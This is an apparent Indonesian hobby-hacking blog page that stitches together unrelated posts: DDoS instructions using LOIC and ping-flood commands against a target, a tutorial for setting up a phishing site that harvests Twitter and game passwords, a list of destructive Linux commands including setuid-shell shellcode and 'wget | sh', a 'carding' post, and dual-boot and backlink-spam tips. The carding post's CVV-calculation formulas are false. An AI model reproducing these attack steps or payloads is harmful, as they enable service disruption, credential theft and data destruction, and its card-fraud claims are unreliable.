Dan server dari situs yang di tuju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/ detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang.
Pertanyaan nya , bagaimana 10.000 komputer tersebut bisa ikut melakukan serangan?
Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan Ping ke situs yang di tuju. Oleh karena itu pentingnya ada firewall di komputer anda, untuk memonitor paket yang keluar maupun yang masuk dari komputer anda.
Jika anda belum memiliki firewall bisa coba zone alarm, silahkan download KLIK DI SINI
Adware biasanya di dapat dari program-program gratisan yang anda download, untuk itu juga harus berhati-hati mendownload program gratisan.
Bagaimana jika ada situs yang mengklaim situsnya sedang di serang , bagaimana kita tahu itu benar atau bohong ?
Bisa kita lakukan analisa untuk mendeteksi benar atau tidaknya serangan tersebut terjadi, atau hanya mengaku-ngaku saja.
Jika anda berkecimpung di dunia Investment semacam HYIP, autosurf , atau pun situs investasi lainnya.
biasanya sering anda jumpai ada situs yang adminnya bilang situsnya sedang di serang pakai metode DDOS, dan terpaksa harus menutup situs nya, ujung-ujungnya yah admin tersebut melakukan SCAM, atau tidak membayar membernya.
Berikut tahap-tahap melakukan analisa benar atau tidaknya situs tsb di serang.
1. Beri Nilai kemampuan finansial dari situs investasi tersebut.
- Sekarang ini sudah banyak jasa penyedia ANTI DDOS , biaya nya pun cukup mahal yakni berkisar $600 / bulan sampai dengan $1000 / bulan.
sekarang anda nilai situs tersebut, apakah mampu membayar jasa tersebut atau tidak. Jika bisnis nya bernilai ratusan ribu dollar , masak sih tidak mau ngeluarin uang $600 / bulan untuk mengamankan situs nya ? Sering anda lihat kan , ada situs investasi yang menulis :
Total investasi : sekian ratus ribu dollar
Total Withdrawal : sekian ratus ribu dollar
Jika benar uangnya sebanyak itu, tentu tidak ragu untuk membayar services ANTI DDOS sebesar $600 / bulan.
2. Periksa kebenaran.
Jika situs tersebut mengklaim mereka memiliki dan menyewa services ANTI DDOS, tanyakan di mana mereka menyewanya . biasanya di situs penyedia layanan ANTI DDOS di tulis nama-nama client yang menggunakan atau memakai services mereka.
3. Periksa hostingnya, apakah menggunakan satu private IP address, atau shared IP address.
Private IP address artinya = 1 nomor IP untuk 1 domain
Shared IP address artinya = 1 nomor IP untuk BANYAK DOMAIN.
sebagai contoh :
situs semuabisnis.com menggunakan shared IP address. IP untuk domain semuabisnis.com adalah http://75.126.30.10/ dan ada sekitar 14 domain / situs yang menggunakan IP ini , salah satunya adalah ambri-servers.com
Jadi jika situs semuabisnis.com di serang, maka efeknya akan terasa juga di ambri-servers.com maupun di situs-situs lainnya yang memiliki IP yang sama dengan semuabisnis.com
Jika semuabisnis.com mengaku di serang, namun anda masih bisa mengakses ambri-servers.com ataupun masih bisa mengakses situs lainnya yang memiliki IP yang sama dengan semuabisnis.com , maka itu tidak benar paling cuma buat gaya-gayaan.. hehehe.
Begitu juga dengan situs investasi yang mengaku situs nya di serang, coba periksa ip addressnya. menggunakan private IP atau shared IP. jika shared IP, coba periksa situs lainnya yang memiliki IP
yang sama dengan situs investasi tersebut. apakah situs lainnya masih bisa di akses atau tidak.
Jika seseorang melakukan serangan ke semuabisnis.com , maka yang tidak bisa di akses bukan hanya situs semuabisnis.com melainkan situs-situs lainnya yang memiliki IP address yang sama akan mengalami overload juga.
Untuk mengecek dia menggunakan Shared hosting atau tidak, lakukan ini.
PING -t situsyangdituju.com
kemudian catat no ip.yg muncul di command prompt.
Setelah itu periksa ip tersebut di http://whois.webhosting.info/no IP jika hanya muncul satu domain, maka IP tersebut khusus untuk 1 domain ( private IP )
Jika banyak nama-nama situs yang muncul, maka IP tersebut adalah 1 IP untuk banyak domain ( shared IP )
Cara Melakukan DDoS Attack
serangan ini tidka dapat dicegah karena memang keroyokan alias ya berdo’a saja supaya situs kita tidak down akibat kena serangan DDoS Attack. ada pun cara untuk melakukan DDoS Attack sangat-sangat mudah, bahkan anak SMP pun bisa melakukanya. untuk mereka yang menggunakan OS Windows dapat menggunakan dua cara. cara pertama adalah dengan menggunakan software bernama Low Orbit Ion Cannon.(308 kb)program ini tidak perlu diinstall cukup jalankan seperti program portable lainya.
1. Jalankan program
2. Setelah muncul Jendela di bagian URL masukan situs yang ingin diserang misalkan http://www.coba.com, lalu klik lock on
3. setelah itu klik tombol IMMA CHARGIN MAH LAZER
4. silakan lihat hasilnya dibawah, disana terdapat keterangan berapa jumlah packet yang connecting, requesting, downloading, downloaded, requested dan failed.
5. jika berhasil berarti berarti pada bagian yang failed seharusnya banyak , yang menandakan bahwa server telah down.
cara kedua adalah dengan membanjiri Ping melalui command promt alias CMD. buka start->run dan ketikan cmd, atau tekan kombinasi tombol Windows + R dan ketik cmd, kemudian enter. setelah jendela Command Prompt muncul ketikan
#ping target.com
setelah itu akan muncul nomor ip dari situs tersebut, anggaplah nomor ip adalah 192.168.1.1, kemudian saatnya melakukan serangan ke sistem server hosting target.com.
#ping 192.168.1.1 -l 39999 -n 10000000 -w 0.00001
yang berarti :
n = besarnya Ping , nilai “10000000″ silakan diubah sesuai dengan yang diinginkan .
192.168.1.1= ganti alamat ip dari situs target.com
-W 0,00001 = Ini adalah periode waktu tunggu antar satu ping.
dua cara tadi jika anda di windows, bagaimana jika di linux, hal ini jauh lebih mudah untuk dilakukan tapi hal pertama yang harus dimiliki adalah hak sebagai root. silakan ketika command ini di terminal linux.
#sudo ping -f 192.168.1.1
system akan melakukan ping sebanyak yang bisa dibuat, biasanya 10.000/menit, jika respondnya adalah Host Unreachable dll, berarti system telah down. untuk alamat 192.168.1.1 silakan ganti dengan alamat ip situs target.com.
Selamat mencoba dan Try With Yout Own Risk.
you know me ? i'am newbie =))
jadi newbie itu gampang , tapi susah dijalanin =))
Membuat Web Phising
Baca Sampe Selesai gan !! 
-First Buat akun Idhostinger dloo
-Kalo udah,langsung ke tab domain,trus buat akun baru
![[Image: 9TTBqrP.png]](http://i.imgur.com/9TTBqrP.png)
-udah ? beneran ? trus pilih kelola
<< Download Here >>
download dulu
kalo lu udh bikin Cari Tulisan Kelola Trus Klik tuh ..
cari tulisan File Manager 3
cari tulisan Upload,upload tuh file yang tadi lu download.
dan saatnya mencari trget,bilang aja kalo itu autolike lah ato apalah,auto follow lah (twitter)
untuk lihat Hasilnya, Para Gay cukup melihatnya dengan menambahkan Password.txt setelah link sobat! Contoh: http://sitesobat/password.txt
nb : bisa buat twitter,gemscool,dll
-First Buat akun Idhostinger dloo
-Kalo udah,langsung ke tab domain,trus buat akun baru
-udah ? beneran ? trus pilih kelola
<< Download Here >>
download dulu
kalo lu udh bikin Cari Tulisan Kelola Trus Klik tuh ..
cari tulisan File Manager 3
cari tulisan Upload,upload tuh file yang tadi lu download.
dan saatnya mencari trget,bilang aja kalo itu autolike lah ato apalah,auto follow lah (twitter)
untuk lihat Hasilnya, Para Gay cukup melihatnya dengan menambahkan Password.txt setelah link sobat! Contoh: http://sitesobat/password.txt
nb : bisa buat twitter,gemscool,dll
1PC 2 os (dual OS)
Beberapa kebutuhan membuat kita
berpikir tentang kemungkinan untuk menginstall dua sistem operasi (OS)
dalam satu komputer. Ya, hal itu bisa kita lakukan. Tapi kita tidak bisa
menginstal kedua OS tersebut dalam satu partisi. Jadi, kita harus
memberikan ruang kosong lagi sebagai tempat untuk OS baru, misalnya OS
lama di C dan OS baru di D. Saya katakan RUANG KOSONG! artinya kalau di
partisi D sebelumnya sudah terisi data, segera lakukan backup pada data
tadi atau jika tidak Anda akan kehilangan. Alternatifnya adalah membuat
partisi baru untuk OS baru.
Apa manfaat menginstal 2 OS dalam satu PC? Untuk :
- Melakukan pengujian compabilitas program tertentu.
- Mencoba aplikasi tertentu dengan versi berbeda.
- Sebagai alternatif jika salah satu OS bermasalah.
- Mencoba 2 versi OS berbeda.
- Membebani drive, karena menambah penggunaan space (ruang) harddisk.
- Harus mengulangi proses instalasi program, driver, update, dan lainnya.
Tips : Perlu diperhatikan bahwa ketika
menginstall 2 OS dalam satu komputer, sebaiknya pada OS baru tidak
dijejali dengan berbagai macam program karena hal itu akan semakin
memperberat kerja PC. Cukup aplikasi penting yang dibutuhkan, misalnya
driver standar bawaan PC, antivirus, dan lainnya. Sedangkan pada OS
lama, bisa kita lakukan.
CARA INSTAL OS KEDUA
Sebagai contoh, saya adalah pengguna
Vista. Dan sekarang saya ingin menginstal XP sebagai OS kedua.
Sebelumnya, pada komputer saya telah terinstal Vista di C. Nah, berarti
sekarang saya harus menginstallnya di partisi yang lain, misalnya D.
Caranya :
1. Masukkan CD installer Windows XP pada CDROM dan Restart komputer.2. Saat BIOS tekan tombol Delete berulang – ulang, begitu muncul menu Press any key to boot from CD tekan Enter atau sembarang tombol.
3. Tunggu proses setup file – file yang diperlukan.
4. Selanjutnya akan tampil pilihan instalasi, tekan Enter.
5. Setelah itu akan muncul tampilan License Agreement, tekan F8.
6. Pada tampilan proses seperti berikut, pilih ESC.
7. Kemudian pada tampilan dibawah ini, berikan pilihan di drive mana Windows XP akan diinstal lalu tekan Enter.
8. Ikuti proses seperti biasa hingga selesai.
Sedangkan untuk menginstal Windows 7 sebagai OS kedua, langkah – langkah yang diperlukan hampir sama saat menginstal Windows 7 seperti biasa. Tetapi pada langkah berikut :
Pilih Custom (advanced). Kemudian akan tampil seperti ini :
Pilih disk di partisi mana ruang instalasi Windows 7 akan diberikan.
DUAL BOOT
Setelah OS kedua berhasil di instal pada PC, maka komputer akan melakukan Reboot dan tampilan Windows berubah menjadi dual boot.
Alternatif lain untuk menjalankan multi OS adalah membuat virtual machine di komputer Anda. Anda bisa menggunakan software virtualisasi seperti Vmware Player atau Virtual Box tetapi dengan virtualisasi, hasilnya tak akan maksimal dan akan terus bergantung pada software virtualisasi itu sendiri.
Silahkan Mencobanya Sendiri.
Cara Melihat Email facebook
gimana caranya liat email facebook temen kita?? 
Bagi yang belum tau.
Ane share trik nya..
[-] Follow Twitter TS
[-] Buka yahoo
[-] login pake email mu
[-] klo sudah masuk pilih kontak
![[Image: od8.png]](http://img59.imageshack.us/img59/743/od8.png)
[-] Klik Impor
![[Image: vTKA3Ja.png]](http://i.imgur.com/vTKA3Ja.png)
[-] Pilih Facebook
![[Image: kjpm.png]](http://img818.imageshack.us/img818/4041/kjpm.png)
[-] Klik Oke
![[Image: 6xIR7pV.png]](http://i.imgur.com/6xIR7pV.png)
[-] Tunggu Sampai proses selese, klik "Selesai"
![[Image: tnO50hm.png]](http://i.imgur.com/tnO50hm.png)
[-] Tunggu loading..
![[Image: lmr6Pvs.png]](http://i.imgur.com/lmr6Pvs.png)
Selesai
Bagi yang belum tau.
Ane share trik nya..
[-] Follow Twitter TS
[-] Buka yahoo
[-] login pake email mu
[-] klo sudah masuk pilih kontak
[-] Klik Impor
[-] Pilih Facebook
[-] Klik Oke
[-] Tunggu Sampai proses selese, klik "Selesai"
[-] Tunggu loading..
Selesai
7 Linux command
First command:
This command will delete your entire files on mounted devices!
- rm -rf / #with root privilege such as 'sudo'
........................................................
Second command:
Hexadecimal code! Same as the first command, it will delete entire files on your mounted devices.
- char esp[] __attribute__ ((section(".text"))) /* e.s.p
- release */
- = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
- "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
- "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
- "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
- "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
- "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
- "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
- "cp -p /bin/sh /tmp/.beyond; chmod 4755
- /tmp/.beyond;";
........................................................
Third command:
- mkfs.ext3 /dev/sda
This command will format your /dev/sda device and of course will delete all files on it.
........................................................
Fourth command:
- :(){:|:&};:
Will run too many processes on your system and causes the computer hang up!
........................................................
Fifth command:
- any_command > /dev/sda
Will write a raw data and all files on /dev/sda will be replaced by the raw data.
........................................................
Sixth command:
- wget http://trap_source -O- | sh
Wil download a shell script from untrusted source and run it when the download finished.
........................................................
Seventh command:
- mv /home/username/* /dev/null
Will move home directory to a place that actually doesn't exist. In other words, it will delete your home directory.
........................................................
So be careful and do a check before running such commands on your system.
Carding Php
![[Image: Credit-Cards_Merithew.jpg]](http://www.wired.com/images_blogs/threatlevel/2011/10/Credit-Cards_Merithew.jpg)
Pada bagian ini anda akan mengetahui rahasia tersembunyi tentang Kartu Kredit,meliputi : Kode Rahasia CVV (Cardholder VerificationValue) Kode Rahasia CVV (Cardholder Verivication Value)
Setiap Kartu Kredit dilengkapi dengan 3 atau
4 KODE ANGKA RAHASIA, yang sering dikenal sebagai CVV (Cardholder Verification Value). CVV memiliki banyak sebutan lainnya, misalnya : CSC (Card Security Code) atau CVN (Card Verification Number).
• Perusahaan Visa menyebutnya sebagai CVV2, • Mastercard menyebutnya sebagai CVC2, • Diners Club menyebutnya sebagai CVV2, • Perusahaan American Express menyebutnya CIN (Card Identification Number).
Visa dan Mastercard Memiliki 3 digit CVV/ CVC, sedangkan American Express Memiliki 4 digit CIN. Biasanya CVV ini terletak di bagian belakang kartu kredit, yang merupakan nomor otorisasi manual untuk kartu kredit supaya bisa melakukan transaksi. Jika anda biasa belanja di Hypermarket / Supermarket dengan menggunakan Kartu Kredit, coba perhatikan,
biasanya seorang Kasir yang teliti, setelah menggesek Kartu Kredit Anda, dia akan membalik Kartu Kredit Anda untuk mengecek 3 DIGIT CVV Anda yang muncul di layar komputernya. Tapi biasanya jika Kartu Kredit Anda memiliki foto, seorang kasir tidak perlu melihat CVV Anda, tapi dia hanya perlu mencocokkan foto anda di kartu dengan diri anda, jadi jangan heran apalagi Ge-Er apabila seorang kasir yang cantik melirik anda ….. hehehe …. CVV jauh lebih sering digunakan untuk TRANSAKSI yang tidak menggunakan Kartu Kredit secara fisik, tapi Lebih Sering digunakan untuk mengecek pembelanjaan secara Online / Via Internet. Jadi Dengan Adanya CVV ini , maka sang pemilik Kartu Kredit akan merasa amandalam mencegah orang yang tidak diinginkan melakukan transaksi denganmenggunakan Nomor Kartu Kredit miliknya. BENARKAH ? 00 % SALAH !!!! Anda akan mengetahui bagaimana cara
mengetahui Nomer Kode Rahasia CVV dari
kartu kredit manapun juga … !!! Syaratnya
hanya 1, anda harus mengetahui NOMER
KARTU KREDITnya , Tidak Bisa Ditawar-
Tawar … !!! Silahkan dibaca terus… Mengetahui apakah suatu Kartu Kredit Valid
atau Tidak Cara Rahasia Mengetahui apakah suatu
Kartu Kredit Valid atau Tidak. Setiap anda
berbelanja menggunakan Kartu Kredit, maka
ada suatu proses keabsahan suatu Kartu
Kredit yang dikenal dengan nama
Authentifikasi, yaitu suatu proses pengecekan apakah kartu kredit yang anda
gunakan masih Valid Atau Tidak. Biasanya
pengecekan akan lebih mudah dengan
menggunakan mesin atau sistem, tapi
tahukah anda bahwa anda bisa juga
melakukan pengecekan apakah Kartu Kredit yang anda miliki Valid atau tidak ? Lalu
bagaimanakah cara pengecekannya ? Mari
kita simak bersama : Contoh : Misalnya No. Kartu Kreditnya adalah
5378-5432-1011-8224 Saya Ingin
mengetahui apakah nomor Kartu Kredit itu
Valid atau Tidak ? Begini caranya :
Terdapat 16 DIGIT pada Nomer Kartu Kredit
Tersebut. Langkah I, Kalikan SEMUA ANGKA pada DIGIT GANJIL
dengan “2”, lalu : - Jika hasilnya Lebih dari 9 maka KURANGI
HASILNYA dengan “9”,
- Jika hasilnya Kurang dari 9, biarkan saja.
Setelah itu JUMLAHKAN SEMUANYA.
Digit 1 : 5 ; 5×2 = 10 {Lebih dari 9}, jadi 10
– 9 = 1 Digit 3 : 7 ; 7×2 = 14 {Lebih dari 9}, jadi 14
– 9 = 5
Digit 5 : 5 ; 5×2 = 10 {Lebih dari 9}, jadi 10
– 9 = 1
Digit 7 : 3 ; 3×2 = 6 {Biarkan saja, karena
KURANG DARI 9} Digit 9 : 1 ; 1×2 = 2 {Biarkan saja, karena
KURANG DARI 9}
Digit 11 : 1 ; 1×2 = 2 {Biarkan saja, karena
KURANG DARI 9}
Digit 13 : 8 ; 8×2 = 16 {Lebih dari 9}, jadi
16 – 9 = 7} Digit 15 : 2 ; 2×2 = 4 {Biarkan saja, karena
KURANG DARI 9}
Lalu jumlahkan :
1 + 5 + 1 + 6 + 2 + 2 + 7 + 4 = 28 Langkah II, Jumlahkan Digit yang ada di posisi Genap
pada data No. Kartu Kredit
5378-5432-1011-8224 Digit 2 : 3
Digit 4 : 8
Digit 6 : 4
Digit 8 : 2
Digit 10 : 0
Digit 12 : 1 Digit 14 : 2
Digit 16 : 4
————— +
Jumlah : 24 Langkah III, Jumlahkan hasil Langkah I dengan Langkah
II
28 + 24 = 52
Karena 52 TIDAK HABIS DIBAGI dengan
“10” (Masih menyisakan bilangan
desimal yaitu 5,2) , maka KARTU KREDIT ITU TIDAK VALID / TIDAK SAH / TIDAK
DAPAT DIGUNAKAN.
Mudah, bukan ? Cara Mengetahui Nomer Kode Rahasia CVV / CVN / CIN dari Kartu Kredit apapun Nah ini dia yang ditunggu – tunggu, saya akan memberitahu anda cara mengetahui
Nomer Kode Rahasia CVV / CVN /CIN dari Nomer Kartu Kredit jenis Apapun. Mengetahui Nomer Kode Rahasia CVV / CVN / CIN dari KartuKredit apapun Misal saya ambil contoh no. Kartu Kredit :
5378-5432-1011-8224 KETERANGAN : Perlu Anda ketahui bahwa saya hanya mengetikkan 16 digit angka yang asal-asalan saja. Saya tidak mengetahui nama pemilik Kartu Kredit Ini, Tinggalnya dimana, berasal dari Indonesia / Luar Negeri, dan sebagainya. Sekali Lagi, saya hanya asala- salan saja memberi contoh No. Kartu Kredit, karena ini hanyalah sebuah contoh saja.
Kembali ke CONTOH No. Kartu Kredit tersebut :
5378-5432-1011-8224
Cara mengetahui No. CVVnya adalah sebagai berikut : “RUMUS 1” Cari Digit ke 8 : yaitu 2
Cari Digit ke 12 : yaitu 0
Cari Digit ke 3 : yaitu 7 (TAMBAHKAN
DENGAN “1”) , berarti 7 + 1 = 8
Maka ketahuan CVVnya adalah 208 , hehehe
… mudah, bukan ? Atau bisa juga dengan rumus yang kedua : “RUMUS 2” Cari Digit ke 7 : yaitu 3
Cari Digit ke 13 : yaitu 8
Cari Digit ke 3 : yaitu 7 (TAMBAHKAN
DENGAN “1”) , berarti 7 + 1 = 8
Maka ketahuan CVVnya adalah 388 , hehehe
mudah, bukan ? Atau bisa juga dengan rumus yang ketiga : “RUMUS 3” Cari Digit ke 9 : yaitu 1
Cari Digit ke 3 : yaitu 7
Cari Digit ke 6 : yaitu 4 (TAMBAHKAN DENGAN “1”) , berarti 4 + 1 = 5
Maka ketahuan CVVnya adalah 175 , hehehe … mudah, bukan ?
Silahkan anda coba sendiri menggunakan KARTU KREDIT ANDA, kebetulan setelah saya iseng-iseng mencoba RUMUS 1, 2 dan 3 dengan menggunakan NOMER KARTU KREDIT yang saya miliki, ternyata CVV Kartu Kredit yang saya miliki
cocok tuh perhitungannya menggunakan Rumus yang ke 3 !!!
Tapi anda jangan kuatir, konon rumus ini ketepatannya hanya 95 % saja, jadi masih
ada kemungkinan 5 % yang meleset.
Jadi apabila anda mencobanya dengan Kartu
Kredit Anda, dan setelah anda
menghitung dan HASILNYA SALAH, maka Beruntunglah Anda !!!
Saya malah jadi was-was dan deg-degan , karena CVV KARTU KREDIT saya
TERNYATA DAPAT DITEBAK dengan menggunakan Rumus No. 3 !!!
Wah, saya jadi harus lebih berhati-hati nich apabila ingin Berbelanja Online, bisa-bisa
Kartu Kredit Saya nanti dijebol maling…. Wah, mudah-mudahan hal itu jangan
sampai terjadi deh … Amin. Cara Rahasia Mengetahui apakah suatu
Kartu Kredit diterbitkan oleh Visa/
Mastercard/ Amex/ Discover Untuk Tambahan Pengetahuan Anda, maka berikut saya jelaskan mengenai nomer sandi dari masing-masing perusahaan Kartu Kredit. UNTUK MASTERCARD : Angka Awal pada Kartu Kredit adalah 51, 52, 53, 54, 55, 56, dll dengan panjang Nomer Kartu Kredit Antara 14 hingga 16 Digit. UNTUK VISA : Angka Awal pada Kartu Kredit adalah “4”
dengan panjang Nomer Kartu Kredit adalah
13 hingga 16 Digit. UNTUK AMERICAN EXPRESS : Angka Awal pada Kartu Kredit adalah “34”
dengan panjang Nomer Kartu Kredit adalah
15 Digit. UNTUK DINERS CLUB : Angka Awal pada Kartu Kredit adalah
300,301,302,303,304,305, dan 38 dengan
panjang Nomer Kartu Kredit adalah 14 Digit UNTUK JCB : Angka Awal pada Kartu Kredit adalah “3”
dengan panjang Nomer Kartu Kredit adalah
16 Digit UNTUK BANKCARD : Angka Awal pada Kartu Kredit adalah “56”
dengan panjang Nomer Kartu Kredit adalah
14 Atau 16 Digit UNTUK DISCOVER CARD : Angka Awal pada Kartu Kredit adalah 6011,
6500 – 6509, 6013 dengan panjang Nomer
Kartu Kredit adalah 16 Digit. Jika anda ingin mempraktekan atau penasaran ingin mencobanya dengan menggunakan kartu kredit yang asli. Sebuah Perusahaan Afliate yaitu FriendFinder mamberi kemudahan bagi para membernya dengan cara memberi DebetCard untuk memudahkan pencairan uang dari hasil merekrut member untuk daftar di FriendFinder. Baca Tutorialnya DISINI.. Kartunya dari perusahaan MasterCard yang bentuknya DebetCard.
cara mendapatkan ribuan backlink gratis
Backlink dari IMT Website Submitter
1.Langkah pertama masuk dulu ke IMT Website Submitter disini www.imtalk.org maka anda akan di bawa masuk ke halaman seperti di bawah ini:kemudian klik IMT Tools dan pilih IMT Website Submitter
2.Pada langkah kedua masukan alamat blog anda beserta kata kunci atau keywordnya, saran ane untuk keyword masukan saja title blog anda, saran lagi nih lakukan hanya seminggu sekali, ya tergantung anda mau sekali berapa kali juga tidak apa-apa tetapi resikonya tanggung sendiri. lihat contohnya pada gambar dibawah ini; klik gambar untuk memperbesar. angka 1 alamat blognya usahakan menggunakan www, angka 2 adalah keyword yang sobat inginkan, angka 3 adalah jumlah submitternya semakin anda memilih jumlah banyak maka semakin lama waktu yang dibutuhkan, jika sobat ingin submitnya yang maksimal alias banyak saran saya lakukan jika anda mau tidur dan pagi hari lihat lagi pasti beres...he he, ya itung-itung ngabisin sisa gratisan internet...
3.Pada tahap ketiga pilih limit the number of created pages, jika ingin lebih maksimal tinggal pilih saja yang paling banyak.
4.Dan keempat tentunya akan membutuhkan proses sedikit memakan waktu untuk dapat ribuan backlink ini jadi sebaiknya anda lakukan hal yang lain dulu yang penting halaman submitternya tidak anda log-out.nah penampakannya seperti pada gambar di bawah ini jika proses submitternya dimulai, apakah anda berminat?
Backlink dari Webmaster deck.
1.Langkah pertama masuk dulu kesini www.webmasterdeck.com maka anda akan dibawa masuk ke gambar seperti dibawah ini:
1.Langkah pertama masuk dulu ke alamatnya disini www.marketingblogonline.com dan anda akan dibawa masuk ke halaman pada gambar dibawah ini:
Oke itulsh tips kali ini yang bisa saya bagikan buat semuanya semoga tips cara mendapatkan ribuan backlink gratis ini bisa bermanfaat buat semuanya, newbie mengucapkan terima kasih atas kunjungannya dan kesediaan waktunya mengunjungi blog super amburadul ini...
Subscribe to:
Posts (Atom)
2 comments
Post a Comment